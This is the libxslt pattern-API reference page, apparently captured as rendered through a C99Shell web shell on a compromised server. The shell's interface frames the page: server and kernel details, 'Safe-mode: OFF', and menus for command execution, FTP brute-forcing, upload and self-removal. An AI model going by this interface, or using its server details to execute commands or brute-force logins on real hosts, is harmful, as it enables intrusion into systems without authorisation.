!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/usr/doc/libxslt-1.0.27/html/   drwxr-xr-x
Free 318.36 GB of 458.09 GB (69.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     libxslt-pattern.html (19.43 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
pattern

pattern

Name

pattern -- 

Synopsis



struct      xsltCompMatch;
typedef     xsltCompMatchPtr;
xsltCompMatchPtr xsltCompilePattern         (const xmlChar *pattern,
                                             xmlDocPtr doc,
                                             xmlNodePtr node,
                                             xsltStylesheetPtr style,
                                             xsltTransformContextPtr runtime);
void        xsltFreeCompMatchList           (xsltCompMatchPtr comp);
int         xsltTestCompMatchList           (xsltTransformContextPtr ctxt,
                                             xmlNodePtr node,
                                             xsltCompMatchPtr comp);
int         xsltAddTemplate                 (xsltStylesheetPtr style,
                                             xsltTemplatePtr cur,
                                             const xmlChar *mode,
                                             const xmlChar *modeURI);
xsltTemplatePtr xsltGetTemplate             (xsltTransformContextPtr ctxt,
                                             xmlNodePtr node,
                                             xsltStylesheetPtr style);
void        xsltFreeTemplateHashes          (xsltStylesheetPtr style);
void        xsltCleanupTemplates            (xsltStylesheetPtr style);
int         xsltMatchPattern                (xsltTransformContextPtr ctxt,
                                             xmlNodePtr node,
                                             const xmlChar *pattern,
                                             xmlDocPtr ctxtdoc,
                                             xmlNodePtr ctxtnode);

Description

Details

struct xsltCompMatch

struct xsltCompMatch;

Data structure used for the implementation of patterns. It is kept private (in pattern.c).


xsltCompMatchPtr

typedef xsltCompMatch *xsltCompMatchPtr;


xsltCompilePattern ()

xsltCompMatchPtr xsltCompilePattern         (const xmlChar *pattern,
                                             xmlDocPtr doc,
                                             xmlNodePtr node,
                                             xsltStylesheetPtr style,
                                             xsltTransformContextPtr runtime);

Compile the XSLT pattern and generates a list of precompiled form suitable for fast matching.

[1] Pattern ::= LocationPathPattern | Pattern '|' LocationPathPattern

pattern : an XSLT pattern
doc : the containing document
node : the containing element
style : the stylesheet
runtime : the transformation context, if done at run-time
Returns :the generated pattern list or NULL in case of failure


xsltFreeCompMatchList ()

void        xsltFreeCompMatchList           (xsltCompMatchPtr comp);

Free up the memory allocated by all the elements of comp

comp : an XSLT comp list


xsltTestCompMatchList ()

int         xsltTestCompMatchList           (xsltTransformContextPtr ctxt,
                                             xmlNodePtr node,
                                             xsltCompMatchPtr comp);

Test wether the node matches one of the patterns in the list

ctxt : a XSLT process context
node : a node
comp : the precompiled pattern list
Returns :1 if it matches, 0 if it doesn't and -1 in case of failure


xsltAddTemplate ()

int         xsltAddTemplate                 (xsltStylesheetPtr style,
                                             xsltTemplatePtr cur,
                                             const xmlChar *mode,
                                             const xmlChar *modeURI);

Register the XSLT pattern associated to cur

style : an XSLT stylesheet
cur : an XSLT template
mode : the mode name or NULL
modeURI : the mode URI or NULL
Returns :-1 in case of error, 0 otherwise


xsltGetTemplate ()

xsltTemplatePtr xsltGetTemplate             (xsltTransformContextPtr ctxt,
                                             xmlNodePtr node,
                                             xsltStylesheetPtr style);

Finds the template applying to this node, if style is non-NULL it means one needs to look for the next imported template in scope.

ctxt : a XSLT process context
node : the node being processed
style : the current style
Returns :the xsltTemplatePtr or NULL if not found


xsltFreeTemplateHashes ()

void        xsltFreeTemplateHashes          (xsltStylesheetPtr style);

Free up the memory used by xsltAddTemplate/xsltGetTemplate mechanism

style : an XSLT stylesheet


xsltCleanupTemplates ()

void        xsltCleanupTemplates            (xsltStylesheetPtr style);

Cleanup the state of the templates used by the stylesheet and the ones it imports.

style : an XSLT stylesheet


xsltMatchPattern ()

int         xsltMatchPattern                (xsltTransformContextPtr ctxt,
                                             xmlNodePtr node,
                                             const xmlChar *pattern,
                                             xmlDocPtr ctxtdoc,
                                             xmlNodePtr ctxtnode);

ctxt : 
node : 
pattern : 
ctxtdoc : 
ctxtnode : 
Returns : 


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0272 ]--